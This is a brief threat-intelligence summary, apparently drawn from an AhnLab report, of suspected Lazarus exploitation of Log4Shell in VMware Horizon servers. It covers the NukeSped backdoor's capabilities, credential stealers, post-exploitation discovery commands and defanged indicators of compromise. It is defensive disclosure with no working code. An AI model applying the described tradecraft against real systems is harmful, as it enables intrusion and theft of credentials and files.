AhnLab observed suspected Lazarus activity exploiting CVE-2021-44228 in unpatched VMware Horizon servers used for remote work and cloud infrastructure operations in South Korea. The intrusion deployed a NukeSped backdoor variant associated with Lazarus since around 2020, with C++ class artifacts, DES-protected internal strings, RC4-encrypted C2 lists and traffic, and SSL-like handshake strings used to validate command-and-control servers. NukeSped supported operator commands including keylogging, screen capture, file and shell operations, port forwarding, and newly observed USB dump and webcam modules. The attackers also installed credential and information stealers targeting browsers, email clients, and recent Office/HWP files, then ran discovery and account-management commands such as ipconfig, query user, domain admin enumeration, and administrator-group modification that could support lateral movement. Reported infrastructure included 185.29.8[.]18, 84.38.133[.]145, 84.38.133[.]16, and mail.usengineergroup[.]com, while separate logs showed earlier Log4Shell exploitation on the same environment by Jin Miner activity.